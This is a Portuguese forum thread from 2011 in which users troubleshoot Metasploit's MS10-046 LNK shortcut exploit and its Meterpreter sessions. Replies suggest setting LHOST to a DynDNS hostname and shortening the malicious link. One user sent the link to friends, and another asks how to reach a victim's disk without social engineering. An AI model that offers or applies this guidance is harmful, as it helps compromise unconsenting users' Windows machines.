Last edited by Bhior; 02-02-2011 at 07:37 PM.
Com certeza nao abrirá nenhuma sessão!gerou normal o link do client
\\10.0.2.15\sRaVXmUk\
enviei pra alguns amigos para testar mas nada de abrir a sessao...
Dê uma estudada sobre redes de computadores, endereçamento de IPs, entenda o que é LAN, WAN, MAN, PAN, etc... Se realmente quer aprender, você deve saber no mínimo os tópicos citados.
Procure a respeito dos payload *dns e utilize tbm o DynDns, com isso você pode deixar seu LHOST como blablabla.dyndns.net, exemplo:
Ainda você pode utilizar os encurtadores de URL para o link acima!Code:set LHOST blablabla.dyndns.net
Se não entendeu nada do que falei, pode estudar mais um pouco!
Att,
(gdb) disass m(y_br)ain
®
Muito obrigado bhior e espreto me ajudaram bastante sim!!
vou estudar mais sobre dns sim e checar esse DynDns
valeu![]()
Boa noite pessoal;
Creio que nas versões mais atuais do metasploit o referido módulo(ms10_xxx_windows_shell_lnk_execute) tenha uma nome diferente, pelo menos aqui na versão 3.5.2 não consegui encontrar este módulo, encontrei apenas: windows/browser/ms10_046_shortcut_icon_dllloarder.
Aproveitando a deixa do tópico, estou com uma pequena dúvida,
Tenho uma pequena rede caseira(2pcs) e estava tentando explorar essa vulnerabilidade, porém não consigo iniciar a sessão meterpreter. Estou usando slack 13.1 e a "vitima" windows XP, consigo ter acesso ao lnk e ao dll pelo IE, e no console do metasploit aparece os requests dos arquivos, porém a sessão nao inicia nem com reza brava.
Gostaria de saber se alguém tem alguma idéia do que possa ser.
Ola caro amigo... entao fera ele nao vem junto nao por padrao, axo que pode resolver vc atualizando seu msf
ou add ele manualmente... baixando pelo packetstormCode:svn update /pentest/svn/framework3/
salve no seu bt renomeia ele pra .rb e mova para essa pasta..Code:http://dl.packetstormsecurity.net/1007-exploits/ms10_xxx_windows_shell_lnk_execute.rb.txt
/pentest/exploits/framework3/modules/exploits/windows/browser
agora perante os testes na sua rede nao posso te ajudar eu fiz uns testes pelo vm virtualbox mas nao tive bons resultados ainda.
[]s
Ola pessoal estou com o mesmo problema que o Maque, ja fiz os passos acima, o arquivo esta na pasta certa, mas quando procuro ele pelo console, ele nao aparece ( search ms10 ) ...
se tento usa-lo da o seguinte erro
alguem sabe o que posso fazer ??msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute.rb
[-] Failed to load module: windows/browser/ms10_xxx_windows_shell_lnk_execute.rb
Obs. ja atualizei o metasploit..msfupdate
Existe alguma maneira, ou outro método de ter acesso ao disco, mas sem ter que utilizar engenharia social?
Cumpz
Realmente foi feita a modificação do nome do módulo nas versões mais recentes:
Link do resultado da pesquisa no site do metasploit:
http://www.metasploit.com/modules/ex...icon_dllloader
Notem que na referencia consta o mesmo CVE.
Existe até um outro tópico referente a esta mesma vulnerabilidade:
http://www.backtrack-linux.org/forum...-proteger.html